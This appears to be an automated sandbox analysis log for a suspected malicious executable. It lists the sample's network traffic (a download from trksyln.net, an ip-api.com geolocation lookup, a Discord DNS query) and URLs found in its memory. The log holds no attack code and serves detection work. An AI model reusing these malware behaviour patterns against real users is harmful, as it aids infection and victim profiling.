Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tgmacro/download HTTP/1.1Host: www.trksyln.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.trksyln.net
Source: global traffic	DNS traffic detected: DNS query: trksyln.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: analytics.google.com
Source: global traffic	DNS traffic detected: DNS query: td.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: a.fsdn.com
Source: global traffic	DNS traffic detected: DNS query: upload.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: fundingchoicesmessages.google.com
Source: global traffic	DNS traffic detected: DNS query: um.simpli.fi
Source: global traffic	DNS traffic detected: DNS query: sync.ipredictive.com
Source: global traffic	DNS traffic detected: DNS query: odr.mookie1.com
Source: global traffic	DNS traffic detected: DNS query: s.uuidksinc.net
Source: global traffic	DNS traffic detected: DNS query: dsp.adkernel.com
Source: global traffic	DNS traffic detected: DNS query: bh.contextweb.com
Source: global traffic	DNS traffic detected: DNS query: www.temu.com
Source: global traffic	DNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: dclk-match.dotomi.com
Source: global traffic	DNS traffic detected: DNS query: px.ads.linkedin.com
Source: global traffic	DNS traffic detected: DNS query: a.c.appier.net
Source: global traffic	DNS traffic detected: DNS query: match.prod.bidr.io
Source: global traffic	DNS traffic detected: DNS query: sync.srv.stackadapt.com
Source: global traffic	DNS traffic detected: DNS query: sync2-dsp.e-volution.ai
Source: global traffic	DNS traffic detected: DNS query: match.adsrvr.org
Source: global traffic	DNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
Source: global traffic	DNS traffic detected: DNS query: dis.criteo.com
Source: global traffic	DNS traffic detected: DNS query: gtrace.mediago.io
Source: global traffic	DNS traffic detected: DNS query: ads.travelaudience.com
Source: global traffic	DNS traffic detected: DNS query: onetag-sys.com
Source: global traffic	DNS traffic detected: DNS query: widget.us.criteo.com
Source: global traffic	DNS traffic detected: DNS query: ep1.adtrafficquality.google
Source: global traffic	DNS traffic detected: DNS query: ep2.adtrafficquality.google
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /g/collect?v=2&tid=G-JH2MNQ1WXY&gtm=45je4au0v9106823843za200&_p=1730398761454&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&cid=1627253267.1730398763&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1730398763&sct=1&seg=0&dl=https%3A%2F%2Ftrksyln.net%2FError&dr=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&dt=trksyln%20-%20Error&en=page_view&_fv=2&_nsi=1&_ss=2&_c=1&_ee=1&tfd=3241 HTTP/1.1Host: analytics.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://trksyln.netX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Thu, 31 Oct 2024 18:19:20 GMTConnection: closeContent-Length: 70

Source: El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digij
Source: El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685BB000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.2243097224.00000250685BF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1794952138.00000250685BB000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685BF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1760578214.00000250685BF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685E1000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.2243289595.00000250685DD000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1728761239.00000250685BE000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1755640275.00000250685BE000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1893904529.00000250685D3000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1745188878.00000250685BE000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1979042378.0000021EDFE50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2106834306.0000026CD00EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950602383.000001C1A86AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000002E.00000002.1945615374.0000026CB6334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 0000003D.00000002.2950366204.000001C1A8600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: El9HaBFrFM.exe, 00000001.00000003.1697781909.0000025067F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: svchost.exe, 0000003D.00000002.2951027713.000001C1A86EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A852D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000003D.00000002.2950445995.000001C1A862E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2949088408.000001C1A3902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950366204.000001C1A8600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950867475.000001C1A86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
Source: svchost.exe, 0000003D.00000002.2950602383.000001C1A86AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 0000003D.00000002.2950602383.000001C1A8661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
